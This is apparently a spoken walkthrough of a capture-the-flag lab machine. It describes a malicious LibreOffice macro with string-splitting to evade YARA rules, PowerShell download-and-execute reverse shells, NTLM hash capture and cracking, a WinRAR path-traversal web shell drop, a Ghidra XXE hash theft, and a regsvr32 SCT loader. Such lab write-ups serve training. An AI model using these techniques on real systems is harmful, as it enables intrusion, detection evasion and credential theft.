What's going on YouTube? This is IPSEC, and we're going to be doing RE, a fun box where you hack the machine of a reverse engineer. It starts off by sending them a malicious OpenOffice document that bypasses all their YARA rules and gets you a shell on the box as them. Then you have to escalate privileges to that of a web service by exploiting a vulnerability in WinRAR. And finally, you have to poison a Ghidra project file with an XML entity injection vulnerability and steal someone's password. So with all that being said, let's just jump in. As always, begin with the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it re, and then finally the IP address, which is 10.10.10.144. Can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being HTTP on port 80, and its banner tells us it's IIS version 10, which is most likely a Windows Server 2016 box. We have a few HTTP nmap scripts running, the important one probably being http-title, telling us the page's title is visit reblog.htb, so we have a potential hostname leak right there. And then finally we have SMB open, no scripts really running, no surprise there. And at the very bottom, we have a clock skew of 51 minutes, so if we do any type of time-sensitive attack like Kerberos, we should probably sync our times because troubleshooting anything that fails because of time is just horrendous. We also have SMB signing is enabled but not required, and in order to pull this off, we need multiple boxes because you can't do NTLM relaying with a single box, so we're just going to ignore that for now. That being said, let's just go over to the page and see what's at 10.10.10.144. So going there, we just see more sites coming soon. Current site is located at reblog.htb, and then our box doesn't know how to get there. So let's go create the host entry for this box. So going into etc host, we can just add 10.10.10.144 and type reblog.htb. And then go back to Firefox. If you try to go to reblog.htb, your DNS is going to be cached. So what you'll have to do is edit preferences and then go to clear and clear history, and then make sure the bottom two boxes are checked. Click clear now. And then when you go to reblog.htb, it should have resolved. Let's go clear everything. Yes. And check this, make sure we don't have a typo. reblog.htb, reblog.htb, HTTP. Oh my god, this is getting infuriating. reblog.htb, Control-Shift-R, there we go. Sometimes dealing with DNS cache is just god-awful, but we get a page checking out the source code to see what this page is created in. Is it WordPress, Joomla, whatnot? We see this Jekyll tag, and Jekyll is a static site creator. So chances are we don't have any attacks against this website because it's not accepting user input. So the main thing I'm going to be looking at is just what the pages are. We have this about page, and this is just a blog where updates will be at. Nothing too interesting there. We have a potential username, malware at re.htb at the bottom. And then I'm also going to take note of the bottom post, automation and accounts on analysis box, and then go to the RSS feed to see if the feed is giving us anything different. It did not like me pasting that in, so let's just go to the very bottom. And we'll see the last post here is the same as the last post on the website, so the feed isn't really telling us anything. So now we have to go through and read each blog post. I'll just highlight the key things in each one. So let's go over to Cherry Tree, Control N to create a new node. We'll call it RE, notes, and man, I really got to fix my speaker. The next thing we need to do is create a node. We'll call this one pages, I guess. And then going here, we have this automation accounts on analysis box post. The key thing here being it's telling you there's a automated process to run malware, and you should always use low privilege accounts on your Windows host so the malware can't access your machine. Well, it's going to suck if someone pops it and finds a way to privask. The next blog post is talking about a tool called Ghidra, and it was just released by the NSA for malware analysis, telling you where to download it. We get another potential username, Kenny. And I think we missed a username on this automation and accounts, Kobe. So we can go back here and create usernames, Kenny, Kobe, malware. And always useful to have the names if we have to do like credential spraying or something. So let's look at Ghidra exploit. And this one's just talking about it opening a port, Java debug port, I believe. So not too interesting. It's saying to run it on localhost. Analyzing document macros with Yara, and it's pointing to a blog post by the machine creator ZeroXDF, just talking about Yara, and Yara essentially is a good way to do a bunch of searching easily. So I'm trying to go down and look at some rules. Let's see. I guess this will be good. So it's a YAML file, so I forget what YAML stands for, but very human readable. It's looking for strings and either the get strings or 3 of the functions. So the get strings, very easy to read. No case means don't care about casing, it's case insensitive. There's other tags, so if you Google like write Yara rules, you can see all the tags. Here are the keywords, all, no case, wide, etc. So definitely check this out. If you just search like no case, you can see no case means case insensitive strings. So definitely should look into writing Yara rules. We can put a note here, pages, automated malware running, Yara rules, and this blog post is also saying nothing else. So let's go to obfuscation and invoke obfuscation, 2 different tools to create a bunch of obfuscation things. Should look into it. I don't think I'll be going into them in this video, as I want to do it other ways. We have an ODS phishing attempts, and this is just saying, hey, if you see any documents that get past the Yara rules that were created, drop them in the malware Dropbox. So now we have to go hunting for the malware Dropbox. So I'm going to do SMBMAP-H 10.10.10.144 to list open shares on this box. And we get authentication error. So I'm just going to do U, anonymous, and we'll see what this says. And I don't know why it decided it wanted to traverse the directory. I was expecting it to only say like the open shares. So something's going on with SMBMAP. We do see malware Dropbox is set to read only. But for some reason, if we try to create a file, test, SMB client, 10.10.10.144, and call this malware Dropbox. Just press enter for the password to do anonymous. We can create files. So SMBMAP is giving us a false positive. And if we do a second dir, eventually the file gets deleted. So we know something is happening. Something processed it and did it pretty quickly. I'm going to just troubleshoot SMBMAP real quick. GitHub, SMBMAP. Let's download the absolute latest version. So git clone, cd SMBMAP, Python 3, SMBMAP-H 10.10.10.144. And we'll do username anonymous again. And that is the output I'm expecting. It's still saying read only. So let's go into this. Grep def SMBMAP. I just want to look at all the functions. Probably want to look into get shares. V SMBMAP.py get shares. And we see this variable can write. So let's see what this is doing. We got a try right here. Except this looks like a good debug message that's commented out. So right here, it's trying to create a directory. And if it can, then it probably sets this can write to true. If it can't, it fails and doesn't create one. And then can write doesn't get set to true, so it knows it's not writable. So let's run this again. And we just get a nondescript error message. I'm going to print E, run this again. We get access denied. So this may be an impacket thing. So I'm going to get the latest version of impacket. Impacket GitHub. Download this. Git clone. What modules is it using? How does it pull it? From impacket. So go in here. And let's actually move impacket up one directory. Impacket. And then cp-r impacket to SMBMAP. And we'll also do examples. So Python will by default load out of a current working directory first, I believe. So this will just run SMBMAP with the latest version of impacket. So that's what I'm trying to do here. And still getting access denied. So impacket. Let's just make sure we're running it. So one thing I always do to see if I am running is we can go into impacket examples logger. The impacket examples logger. And we'll just put a print statement here real quick. IPsec was here. And if this prints, we know we loaded the library. So looks like there is potentially some bug of impacket saying a anonymous share is not read-write. Don't know exactly what that is, but hopefully the troubleshooting helped. Sorry, we can't resolve that, but let's just move on and go into trying to figure out how to do this. So we want to go and create a ODS file. So the first step is Googling what is an ODS file, and we'll see ODS is open document. And this is like OpenOffice's version of Excel. So let's go install LibreOffice. So apt install LibreOffice. And this will probably take a little while to install. So I'm just going to pause the video because it's got to download about 1 gigabyte and then install it. But once this gets installed, we'll start creating the macro. Now that it's installed, we can just execute LibreOffice to open it. And then to create a ODS file, we want to do calc spreadsheet. And we can confirm this is ODS by doing file save as, and we see ODS. And I'm hyping on that because the blog post says ODS phishing attempts. So it's expecting an ODS file. If you did a Word document like ODT, it's not going to work. It's configured to only work with ODS. But to create a macro, you go to Tools, Organize Macros, and then select LibreOffice Basic. Go to your document, click New, and then give it a name. I'm going to do Run Me. Doesn't have to be that, it can be anything you want. And then you're greeted with this. In Microsoft Office, you just change the sub to be, I think, like autoload or onload or something to run on the startup. OpenOffice is a little bit different. We'll get to that in just a minute. But to run a command, we're just going to use the command called shell. And we're going to start off by doing the simplest thing possible, and that is just pinging ourselves. And the reason why I start with ping is because we want to make sure everything works. And once we confirm we get code execution, then we weaponize it. If we start right off the bat and do something complicated, we don't know exactly where it failed. If this fails, we know we have to do some serious obfuscation or something went horribly wrong. So I just press Control S to save it, and we'll save it in root, HTB boxes. Select RE, we'll create the directory macros, and we'll save it in here, and we'll call this document we'll just call it ping.ods. And now, in order to make it run on load, we go to Tools, Customize, select this Events tab in the top right, and then, or top middle, I guess, and then select Open Document, and go to ping.ods and select your macro. So you can see open document, and it's running standard runme.main. So now when this document is opened, it will run that. So what we can do is start a TCP dump. So TCP dump -I ton 0 ICMP. And then on our host, we do SMB client 4 backslashes 10 10 10 110. No, 144. And then 2 backslashes the file, the share name, which I think is malware Dropbox. Hit enter for default authentication. And we can just, LCD, I think, macros, LPWD. Oh, I don't know. LCD, I think, changes the local CD. I was only in the RE directory, and we created the directory macros, so that's why I had entered that. So if I just do LCD, doesn't say anything. Okay. Put ping.ods, and we see it was uploaded, and hopefully in a few seconds, we will get a ping from that box. There we go. So we have confirmed we have code execution. So let's go and make our document a little bit more complicated and say it's going to do cmd/c ping. And I saved it. I'm just always going to go to this document and save it as well. Sometimes things are picky which window you save it in. So save this one. And all we did was add cmd/c, which is a common flag for running malware. And a lot of things will detect that. So if we don't get a ping back, we'll know we can't do that. And we have to obfuscate a little bit. And I'm not seeing a ping back, so let's obfuscate it. So we can say, please subscribe is equal to CM. And then we can say to my is equal to D/C. And then channel is equal to ping-n1 10 10 14 2. And the shell would just be, please subscribe to my channel. So all we did here was break up the string. So now if something's just searching for CMD and macros, it won't see it because we broke it up between 2 variables. So save this, and then we put this in. I didn't save it in the sheet. Okay, it doesn't matter. You can save it in the macro, but we get a ping back. So we know that works. So let's try running PowerShell. So PowerShell, save, put, and we get a callback again. So now let's do PowerShell encoded command. So before we do encoded command, we have to create the base64, and PowerShell expects it in UTF-16 little endian. So anything we do, we have to make sure that's encoded in that. So ping-n1 10 10 14 2. And if you XXD this, you can see what the hex looks like. This is not UTF-16. If we do iconv-t for target, UTF-16LE, XXD again, you can see every character is taking 2 bytes, which is 16-bit. So let's now base64-w0 and copy this. And we can say PowerShell -encoded command paste. So save this, save, and we will upload it. And it doesn't look like we are getting a hit back. So let's further obfuscate this by splitting the string up. So we'll say channel is equal to powers, and we'll call this and support is equal to this, and we'll split that up here. And we'll call this on Patreon is equal to this. So let's add the new variables and support me on Patreon. So save this, save it here to make sure, put the file, and hopefully we get a ping. If not, we have to go troubleshoot exactly why, but nope, we do. So now we have a way to run PowerShell encoded commands, and at the end of the video, we're going to do a different way. We're going to go to LOLBINS and execute it without using cmd/c, but for now, let's just continue down this path. So the final step is go back to that ping, and we're going to change this to be ix new object net.web client download string http 10.10.14.2/evil.ps1. Okay, that looks good. Get this base64. Copy. Go here. Paste it in. Save. Save. And we have to create a www directory. And then we got to copy a file in here. So I'm going to copy user share nashang. Doesn't exist. Apt install nashang. cp user share nashang shells invoke PowerShell tcp.ps1 into www. Let's edit this. Actually, let's move it first to be evil.ps1 and then edit it. So this is just a PowerShell reverse shell. So we'll grab the example for reverse shell, put it at the bottom, and then we will put our IP address, which is 10.10.14.2, and then the port we'll do 9001. We're going to do python 3-m http.server on port 80. And then here we can do nclvnp 9001. And I forgot to rename the document away from ping, but oh well. We just upload it. And we see almost immediately we get a reverse shell. So we can do who am I to see we are the Luke user. And generally the very first thing I do when I hop on a Windows box as a user is I want to get his password as soon as possible, because if I lose the shell, having the password helps me keep the shell. So to do this, I'm going to run responder on my box with iton0, and we have to get rid of this. We don't need that anymore. So let's Control-C out of that and rerun it. So now we have a tool that's listening on port 445 SMB, and whenever anyone connects, it's going to try to dump the hash of that user. So on a reverse shell, we can just do get content / 10.10.14.2 / please subscribe. All it's going to do is try to connect to the share, and when it does, we get the hash. So we can copy this hash and send it over into a Kraken to try to crack it. So let's do SSH Kraken and then cd hashcat hashes. We'll call this re.ntlm. Paste. And actually I want to name this re.ntlm v2. And then we can do /hashcat example hashes less and search for NTLM v2, probably capital NTLM, and we see the mode is 5600. So we can do /hashcat -m 5600 hashes re.ntlm v2, and then my word list is going to be opt word list rocku.txt. So while that's going, we can then continue our enumeration of this box, and let's run WinPEAS. So cp opt, not that, privilege escalation awesome script suite, and this is just on GitHub, so you can just Google this and you'll find it. Let's run the bat version, and we just want this. So copy this here, It's in our www directory. We can kill responder, start a web server back up, and do ix new object net.web client download string http 10.10.14.2/WinPEASEXE.bat. So see if this executes. Did not want to. So let's just do cd/users Luke, and we'll go into his music directory and download this file. So wget -o for out file WinPEASEXE.bat, and this will be at http 10.10.14.2 WinPEASEXE.bat dir. So cmd/c WinPEASE.bat. Does this work? Or am I not going to get the output of this command? I'm just going to let this run for a little bit. Look back at the Kraken, and it actually did not crack. So you can, at this point, specify a rule file. So -r rules inside pro passwords pro, and let that go. But not actually sure if that executed. I'll just give this like 5 or 10 minutes, and we'll see if we come back with output. It's now finished running. It took probably about 7 minutes and didn't give any output until it was done. So we can just do a search for cmd/c to go to the very top where it began running and start looking at the output. The first thing we see is just a bunch of information about the OS. We can see it is Windows Server 2019. So I was wrong at the beginning of the video when I thought it was 2016. We see the install date was 3/13 at around 5:30 p.m., but the system booted on January 5th. Not too much useful information there. We can see hotfixes. We didn't enumerate any, so either there's no patches installed or we just don't have permission to view them. Date, time, audit, WEF, lapse, UAC. We can see UAC is enabled. There's no registered AV. PowerShell settings. We can see transcript, module, and script block logging. Definitely good things to take note of for like OPSEC checks. Mounted disks, CND, environment data. It's a bunch of information in that path. Installed software. This is also handy. We can see Java's installed, which is a requirement for Ghidra, Notepad++, pzip, sysinternals. We can copy those. That's interesting. And we also have WinRAR. So go here, Control-Shift-N to create a new node, call this software, and paste this in. And we also want WinRAR. Things to keep in mind. Running processes. Nothing too interesting there. Things that run at startup, always elevated. IP information, netstat output, firewall information, ARP tables, the host file, DNS, Wi-Fi, current user information. So we can see when he last set his password 327 at around 7:30 a.m., but he had a login January 5th. Let's see. User information, privileges. So looking at the tokens, we don't have the SE impersonate, so we couldn't do Juicy Potato, even if it was possible in Windows 2019, which I'm fairly certain it is. It's just not public or anything. I wouldn't depend on 2019 preventing you from that exploit. There's a few users. We have Cam, Kobe, and Luke. So if we go here, we got Cam, Kobe, Luke. Cam, Kobe, Luke. And if we wanted to, we could also do net user for each of those users. So we'll do that at the end. Administrative groups, currently logged in users, service vulnerabilities. That's just giving information. DLL hijacking. Windows credentials. So this is the DPAPI master keys. On engagements, I'd always recommend downloading these because there is a domain backup key. So once you get that, you can decrypt them all. And if you go to ipsec.rocks and type like EFS, it is helpline. This will show you how to use these keys to decrypt EFS files with just the user password. So definitely keep that in mind. Always download any encrypted blob you can. Let's see. Files and registries that may contain credentials, and that's it. So the one thing we want to do is look at some users. So we can do net user cam. And is my shell dead? My shell may be dead. Start this back up. SMB client. We got to go into macros. SMB client 10.10.14.2. And then the password was, or not password, share was malware Dropbox. And it's 10.10.10.144. Put ping.ods. Uploaded. We're going to get that callback. There we go. And we got the shell back. Okay. So we can do net user Luke. And we see password last set here. I'll just copy this whole line. Copy. Go here. Paste. We can do Kobe. Copy. Paste. And he is in remote management use and administrators. Cam. And password last set here. Not any interesting groups. So the user we want to get to is probably Kobe. So keep that in mind. At this point, we're kind of stuck. We could try to escalate to the IIS user. So to do that, we go into inetpub and then www.root dir and try to go into each of these websites. I do see an extra thing. We see blog, IP, and RE. So if we do dir and blog, we can't even do it. Dir IP, can't. Dir RE, can't. But chances are there is a re.htb that goes to a different place. So let's edit our host file. If I could type correctly. And we can say re.htb. Save this. And go to http re.htb. And it just says, please check back soon for updates. If we view the source, it's talking about uploading stuff in Ghidra. So exe should be at project root directory structures, look something like this. So if we go back to our shell, I'm guessing the Ghidra probably wants to go into project drop, but we can't access that. So let's try to look at exactly how the automation works for us actually executing this Office document. So I'm going to go into cd users Luke, and we're going to take a look at the directories here. If we do dir desktop, there is that user.txt. If we do dir documents, we have a few files. So if we type ods.yara, these are the bad strings. So here's some good examples. So if it contains any two of these PowerShell variables, then it's going to be blocked. So PowerShell, new object, net web client, whatever, -e. So this is why the encoded command didn't work. So PowerShell and -e, then it flagged. We see no case, wide, and ASCII. no case, case insensitive, ASCII just being text, and wide. So it's doing both UTF and ASCII, I believe. Or UTF-16 little endian. But yeah, so that's how the URLs work. So let's go and check out process samples. .ps1. We got a bunch of stuff here. I'm going to copy it to my local box so I have syntax highlighting. So let's see. It starts here. Copy. We can just do vi process sample.ps1. Paste it in. Oh, we don't have PowerShell syntax highlighting. Wonder if I trick it and just say it's Python. What's going to happen? Better than nothing. So, process directory, C:users documents malware processed, files to analyze, ODS, YARA, executable in the rules. So we see it's moving the file into process directory, getting child item, copying it. This is where it's checking the YARA. Let's see. We're trying to figure out how it's putting things in the project Dropbox. So invoke item, kill. We have it using potentially WinRAR. And let's see, process.dir temp.zip. So let's see, what is process.dir? Malware process. So based around this being something with WinRAR and this being super unique in terms of HackTheBox, I went and researched a bunch of vulnerabilities in WinRAR, and one of them that popped out was the ACE vulnerability by Checkpoint Research. And if we click on this and then click here, it talks about a vulnerability in WinRAR, which is kind of like a ZipSlip type vulnerability that allows you to place a file in unintended locations. So we're going to do this and place a file in a www directory. So you can read this whole thing to get an understanding of what's happening, or you can just download the script. So I think it's evilWinRAR gen right here. So we can just go to a new pane, cd opt, git clone, paste that, cd evilWinRAR gen. I'm going to do pip3, or let's look at what it is. Is it Python 2 or 3? It looks like it is 3. So pip3 install -r requirements.txt. And then we can execute it to see what we want to do. So -o is the file name, -g is good file, and -e is bad file. So I'm going to copy, user, share. We gotta get an ASPX shell. Share is TennC here, apt install TennC. Trying to think of a good ASPX shell. We have payload all the things. So opt, payload all the things, find.grep, ASPX. And I'm doing ASPX because it is Windows, so chance of Windows executing this is probably the highest. Doing something like PHP probably doesn't make sense because they need something extra to be installed. So we can cd dot here and cp shell.aspx into opt evilWinRAR. And we can just do Python 3, look at the arguments again, -o, shell.rar, -e is going to be shell.aspx, -g for a good file is their requirements.txt. and -p for the path, C:\\, what is it? C:\, /inetpub, www.root, re. This is the path we want. Copy. And we'll just paste it. So we successfully created that archive. So we can just copy it or move it to HTTP boxes re www. Rename this pane to evilWinRAR. Go back here. Do we have a www server? We do. So we can go back into users, Luke, documents, and we can go cd malware process and try to download this. So we can do wget-o shell.rar, and we'll download from HTTP 10.10.14.2 shell.rar. So we can download this, and notice it's gone. So if we go back to a web browser, re.htb/shell.aspx, we get application cannot be found. So let's try copying it to a different directory. It being gone means, well, something happened. What's in this ODS directory? Try it here. dir, we can see it. Give it a few more seconds. And it's gone. Refresh the page, and we still can't see it. So let's go back to evilWinRAR and look at a command to see if we screwed anything up. ls requirements.txt. So all the files are there, so it's a valid archive. Let's go and examine exactly what we created. So cd www xxd shell.rar. We can do -c32 to change the columns to 32, which is a bit longer. And then just less this and look for where our payload is. So I can just search for www.root, and we see it here. So C:\/inetpub www.root/re shell.aspx. So we probably have to have a trailing slash on that. So let's create this again, except put re/cp shell.rar to HTTP boxes re www, and go back to a netcat shell, and we can do wget. Well, we did. Let's do the malware process first. wget-o shell.rar 10.10.14.2 shell.rar. So we'll copy this to the clipboard. dir, file's gone. Still can't be found. Let's go to the ODS, download it, wait for this file to disappear. Come on. This time it's going to be gone. Nope. There we go. Finally gone. Refresh. That's a different error. What were we getting before? Shell 2. So server error can't be found like that. And then shell. Why is that different? So maybe we have a bad shell. I don't know why it's a different 404. That is absolutely bizarre. So let's go back. bi shell.aspx. Should be good. So let's go back to a theory before and put a non-malicious file. So v test.html, and we'll just call this please subscribe to IPSEC. Okay, let's make sure test.html doesn't already exist. So we'll just paste this in and we get a 404, which is fine. So let's go generate another malicious archive, and this time the evil file is going to be test.html. And we gotta put the trailing slash. Okay, cp shell.rar to, where is HTB boxes, whatever. And we can go back here to a reverse shell and do the wget command. Let's just copy it, paste. Okay. So validated, we can do that. So let's try this evilWinRAR again. And I'm going to chmod 777 on shell.aspx because maybe it obeys permissions. And I think for ASPX files to be executed, they have to have that bit set. So let's test this real quick. And because that file may exist on the server, let's rename it to cmd.aspx because why not? So let's do this. cmd.aspx. And the real reason why I renamed it is just because I didn't want it to like fail to copy to the server because it already exists or something weird like that. So that looks fine. Copy this to www. Go back here and we will paste this command. Wait for this to disappear. Come on. And you're gone, right? Yes. So now cmd.aspx. 404 not found. So it's probably this web shell. So maybe we should try something else. Because we validated we can copy files there. We just can't use this web shell for whatever reason. So I think the logical thing to do would be to try like ASP. So opt, payload all the things, find.grep ASPX, cd upload insecure files, extension ASP, and we can do cp shell.asp to opt evil. Run this same command, except shell.asp, and I'm just going to save this directly to root htb boxes re www to save us a step. So wget, copy, paste, and maybe, wait, okay, I did cmd.aspx too. Shell.asp. dir, it's gone, but we can't access it. So at this point, it's time to change up the shell. I'm going to search TENNC GitHub, and this is another collection of a lot of good shells. The web shell directory, so we can go into opt, get clone TennC web shell, cd web shell, find.grep ASPX, \.aspx. Oh man, there's so many. Yeah, there is definitely a lot of these shells. Let's do this, fuzzDB. So we'll copy this, to / evilWinRAR. And we will run it here. So this will be cmd.aspx is the file name. And should be good. What was my previous one I did? Okay, shell.asp. So we just did cmd.aspx. Let's rename this because we've already used this name once. Please work.aspx. Because I'm grasping at straws here why I'm getting those 404s. Please work. Actually, chmod 777, please work. Trying everything possible. Please work. Okay. So it copied it there. Go to a shell. wget it. Go back here. Please work.aspx. File still exists. It's gone. And hey, we got a shell. So apparently it just doesn't like that one web shell we were using, which sucks, but now we have a shell. So if we do who am I, we can see we're IIS apppool /re. So we're now the IIS user. So if we do a reverse shell again, so let's go here. We can get out of my Kraken. We can call this one Luke, and this one will be IIS NC LVNP 9001. And let's see. We just got to call evil.ps1. So cmd.exe/c PowerShell. Do I have the macro still saved? I don't. We'll just do IX. IX, new object, net.web client, download string, HTTP 10.10.14.2, evil.ps1. Run that, get a shell, who am I, and we're the RE user. Now, if you did run the WinPEAS again, there's probably a service you can edit to privask, but that was an unintended path, which we'll cover at the end of the video, and we'll also cover getting a shell at the end of the video as well, via an unintended way using ZipSlip. But we're just going to follow the intended path right now. And now we can write to all the directories. So we can write to this proj drop and do dir. So if we echo test here, we can see it's created, and then it also disappears. So if we go back and just look at re.htb and look at these notes, it's talking about uploading a Ghidra thing for analysis. And it wants it to be in a zip, and it's telling you the structure. And if you went to Ghidra on GitHub and searched through everything on the issues tab, you can do is closed, search for like security, and you can see security related issues. You can search by like RCE and see exact RCE things, possible and function bit explorer plugin. This is the one the blog post was talking about on March 7th, the JDWP web port. There's also like XML any injection one, so that's the one we're going to be starting with. So project handling is susceptible to XXE. And if you read through this, it's pretty simple. It's just doing a XXE file in a Ghidra file. The example is doing it in test.rep project.prp. So we're just going to put this here, and it's going to be the same exact logic we did with the previous one of just doing a callback to a responder server and getting it to give up a hash of whoever's running this. So let's try this. So on our box, we just have to run Ghidra. So I already have that downloaded and installed. And we'll just create a new project and then put that XML any injection in there. So let's do file, new project, non-shared, sure. The name will be boxes, RE. Let's create a directory here, make dir Ghidra. Ghidra and project name will be please subscribe. So click finish. If we ls Ghidra, we have the directory so we can close it. So we already created everything we need. And then they went into the .rep directory and edited project.prp and put the XML any injection string in here. So let's go to payload all the things and look for XXE to get a payload. So cd opt payload all the things, find .grep-i XXE, and we will do, let's see, what is this? Less ./that. I'm just going to Google one real quick. XXE LFI example. I want one to get as close to this as possible without having to type it. We'll just type it. That's not much. So let's kind of just view image. Okay. So let's see. That line's the same. Doc type, AAA. This piece doesn't matter. Entity, %, DTD, system. And we're going to say it's at 10.10.14.2. Please subscribe. Okay. %DTD. Okay. And close that doc type. So all we did was put these 3 lines in. Or 4 lines. Okay. And now it wants it to be zipped. So let's maximize this again. Zip. I think it's file name and then files. So we'll do zip. Please subscribe.zip star. Okay. So now we can move this to the www directory. Go back to a shell. Undo responder -i ton 0. It's going to error saying can't listen on port 80 because we have a Python server there. That's fine. This is only using 445, so that doesn't matter. Oh, we got to go to the IIS. wget-o. Please subscribe.zip. HTTP 10.10.14.2. Please subscribe.zip. Okay. Downloaded, and we didn't get anything. So what I'm going to do is we're going to go back and edit this. Oh, actually, go back here first. RE. So exe should look something like this. Okay, that looks fine. I was just making sure it didn't want like a directory beforehand. And it doesn't look like it does. Unless I need to create a, like, please subscribe.exe to trigger something. But I don't think that's the case. V project.pop. Oh, I have 2 backslashes here. Should only be 1. I don't think that's the case though, but it doesn't take long to test it. Zip. Let's remove it first. Zip it again. And then move please subscribe.zip to www. And do this wget command again. And while that goes, let's just edit this to go back to HTTP. And what this is going to do is validate it's working, because the example it's saying it pulls from a web server. So get it as close to the POC as possible. Let's see. When I first created that zip, what directory was I in? Ghidra. Okay, I was in the right directory. The one I just uploaded, I'm definitely in the wrong directory. So, please subscribe.rep project.pop. Okay. Zip please subscribe. What's that www? I screwed a command up somewhere marvelously, but looks like I've recovered. So move this to / www wget and if the XXE works, we should get a hit for 2 things. dir, it's gone, but we did not. So if we look at please subscribe.rep and project.pop, we should have just got a file called please subscribe, and we clearly did not. So I'm just going to try it a few more times. So this time I'm just going to get rid of HTTP and we'll do a UNC path with /. If you remember the last time we did the UNC path, I had it as backslashes and I had 2 backslashes here. So actually I'm going to try it with backslashes first to see if that's it. I'm guessing if I do it backslashes, maybe I need 4 and 2 here or something weird. But let's just validate this. Okay. And we don't have a zip here, so we can zip. Please subscribe. And we can move this to www. Go back here and do the wget thing. Go here. And nothing. dir, it's gone. So the next step, let's do this with /. So / there, 2 here. Okay. Then we zip this. I'm just going to put this in one line. Please subscribe.zip to / www. Okay. And we can do this. Going to the next thing. We got it. But no hashes. So something weird is going on. Let's go in www. Unzip. Let's make dir temp. CP, please subscribe to temp. And we'll go in there. Unzip. And I found out the issue. we're not putting all the files. So we need a -r flag in our zip command. That was stupid. So let's go back to Ghidra, go back to that zip command, add the -r flag. That looks better. It's adding a lot more things to the zip. So if we wget this, go here, still nothing. Let's just redo everything. So we messed up royally, so let's redo this. But I want to copy that project PRP out. So Ghidra, please subscribe. CP, project.prp, copy it here. Okay. Ghidra is empty. Opt Ghidra, Ghidra run. File, new project. Yes. There. Please subscribe. Finish. New folder. Test. Okay. Should be saved. CD Ghidra. Please subscribe.wrap. CP. The project. Okay. Zip-r. Please subscribe.zip on everything. Okay. MV this. Do dub. And we'll do this wget command and pray this works. There we go. So now we have another hash. So maybe just fooling around with the file so much I corrupted it somehow, but we have this. So we can do the same thing we did before. SSH into the Kraken, go to cd hashcat v hashes / re.ntlmv2, paste Kobe's hash in, and then /hashcat, the NTLM version 2 format, which is 5600, hashes re ntlmv2, and then opt word list rocku.txt. cd hashcat. There we go. And looking at the results, we recovered one password, and that password is championship 2005. So we can copy this, and we have to go back to a shell to use it. So we could try and do psexec with him because he is an admin. So we do which psexec.py locate psexec.py, and we can run that. So opt, we'll do user share doc python 3 impacket examples psexec.py Kobe at 10.10.10.144. Paste a password of championship whatever in, and we can't because we don't have permission to open SVC Manager. However, we can go back within PowerShell and just manually create a token. So we're going to create a secure string. So define the pass variable and then say convert to secure string, and the password, I think it was championship 2005. Let's go back here. Championship 2005. Okay. And then dash as plain dash force. So pass is a secure string. Cred is equal to new object. system automation management PS credential dot backslash Kobe and pass. Okay. Typoed something. Cred equals new object system dot automation dot management dot PS credential. Thought that was right. Let's copy, paste, Google, paste. How do I have it wrong? System management, automation. Yeah. That's it. Probably have a typo somewhere. So I'll just paste this. Dot backslash Kobe. Pass. Yep. Had a weird typo somewhere, or maybe it's case sensitive. I don't know. But now we have a credential object, and we can do Invoke-Command, computer. We'll do re.htb dash credential cred dash script block. And this is the brackets ix new object net.web client download string http 10.10.14.2 evil.ps1. So copy that, close that. Think that's good. We can close out a responder, nc lvnp 9001. And let's see. Failed. Let's do invoke command dash computer re. So PowerShell remoting always likes correct host names. And host name of this box may just be re. Yep. There we go. Who am I? We're Kobe, CD, users, administrator. CD backslash users, CD administrator, desktop, and we can now get root.txt. So that is the box doing it the intended way. And now let's do the unintended route. I know that was a super sloppy cut, but the last piece of the video was corrupted, and I'm just noticing it now, like 3 weeks later. Did the recording on January 5th, and today is January 27th. So with that being said, the two pieces I want to show is using reg server 32 and that OpenOffice macro so we can get it working with PowerShell without touching cmd.exe. And then the second piece I want to show is doing a different privask because the IIS user on the server can modify the USO SVC, which I think is the Windows Update Orchestrator service. Doesn't matter what service it is, we can modify to make it do our bidding. So let's get into the macro. I'm going to have to open up my file browser. So let's open a folder, HTB, boxes, where is it? RE, macros, and ping.ods. And I'm also going to go and Google something. I have reverted this box because it was several weeks. So this pleasework.aspx doesn't exist right now. So what I want to do is Google reg svr32 SCT file because I know from experience that this file or this binary can load code in the form of SCT files. It's just something I had known previously. So knowing that, I can just take this little payload and weaponize it. So let's grab this and we will go into a www directory and look at it. So I'm just going to call this evil.sct and we will paste it. And all we have to do is call reg svr32 with these arguments, and then it should execute. And it's just doing running calc.exe. We want it to run PowerShell, so we can do PowerShell-encoded command, and in our SCT file, I believe we have that encoded command we want to run. So let's go to macros, edit, ping.ods, standard, run me, copy the base 64, and this base 64 is literally just an IEX call, so we can echo this and base 64-D. You can see IEX new object, and it's going to download and execute evil.ps1. So that's all that's going to do. We can get rid of all these comments because they aren't needed. And I'm just going to cat this so we can grab this easily in our clipboard. And we're going to go back to this. And the variable we want is just that. And we can delete everything. And we can even delete this. And we change this URL to be 10.10.14.2/evil.sct. And then we want to run shell and only do please subscribe. So that changed our macro up quite a bit. So if we save this, exit it, and we have to start our web server. So I'm going to do python-m. We'll do python 3 -m http.server on port 80. And we want to do nclvnp 9001. And the last thing we want to do is upload the macro. So I'm going to go into the macros thing, SMB client, what was it, 10.10, oh, I have a thing of this. So re.htb and malware_dropbox, I think. Enter, do a dir, and we can just put ping.ods. And we should see it now grab evil.sct, then evil.ps1. So there we go, evil.sct, evil.ps1, code execution. So this allowed us to do this without even having to worry about any of those YARA rules. So the next piece we want is to upload that ASPX, and that was the simple RAR file, because right now, if we do who am I, we are Luke, do who am I /all, we're not a part of the NT services. So for this one piece of the exploit, it is key we're a member of NT services. Let's see, the next thing we want is users, Luke, documents, and malware Dropbox, I think. So wget-o, http 10.10.14.2 shell.rar, and crap. Shell.rar, http 10.10.14.2 shell.rar. And hopefully the next time I get this reverse shell, I remember to use rlwrap so I can have that left and right key, because it's really annoying not having that. So do a dir, I don't see anything. We go to please subscribe.aspx, it's not there. Maybe it was in malware process. Let's just go up so I can copy. Copy, paste. dir, it's gone. And we're still getting 404. So maybe I have the URL wrong, or we did something wrong. Malware Dropbox. Let's try this one more time. Maybe it was the ODS folder. Put that wget again. Wait for this to disappear. It's gone. Refresh. There we go. So the ODS folder is where it was. So now we have to do the reverse shell again, and this will put us as the www user. So let's exit that, and let's see. We can probably just go back and edit this macro to copy it. Actually, it's in the SCT file. So cat www evil.sct, and we just want to run this PowerShell command. So cmd/c PowerShell, and paste that. All right, that should work. NC LVNP 9001. Run. And that did not. Oh, I don't have encoded command. Encoded command. There we go. So if we do who am I, we're IIS. And if we do who am I /all, unlike the last time, we have a lot more things. And the key thing in this, I think, is built-in IIS users. No, right here. NT Authority Service. This is the key group that is able to modify the service we want. 